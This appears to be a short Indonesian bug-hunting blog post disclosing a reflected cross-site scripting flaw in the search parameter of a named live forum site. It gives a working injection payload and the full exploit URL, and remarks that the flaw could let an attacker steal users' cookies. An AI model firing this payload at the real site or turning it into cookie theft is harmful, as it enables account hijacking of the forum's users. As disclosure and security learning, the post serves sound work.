[SOCIAL.ICWR-TECH.ID] Reflected XSS

Learn System Security - Halo sobat hacker, gimana kabarnya? semoga baik-baik aja ya. Seperti biasanya, saya akan berbagi bugs yang saya temukan, kali ini adalah bug Reflected XSS pada situs yang beralamatkan social.icwr-tech.id.



Reflected XSS :
Payloads : </title><input style=position:fixed;top:0;font-size:999px; onmouseover=alert(document.domain)><!--
URL Vulnerability & Parameter : https://social.icwr-tech.id/index.php?a=search&q=
PoC :

Reflected XSS pada social.icwr-tech.id ini sangat mudah ditemukan, karena tidak ada satupun filter dari input search yang dimasukkan. Bahkan baby pun bisa menemukan bug Reflected XSS ini. lol 🤣 justkidd(ing) bro, keep learn.
https://social.icwr-tech.id/index.php?a=search&q=</title><input style=position:fixed;top:0;font-size:999px; onmouseover=alert(document.domain)><!--

Screenshot :

Bug Reflected XSS ini sangat berbahaya karena bisa mencuri cookie user dari situs tersebut, karena juga situs tersebut bisa dibilang seperti "forum" jadi banyak sekali user yang menggunakan situs tsb.

and if you don't know impact of xss attack, you say "hahaha bullshit, stupid poc".

Sekian dari saya, Happy Bug Hunting and thanks for come here.

0 comments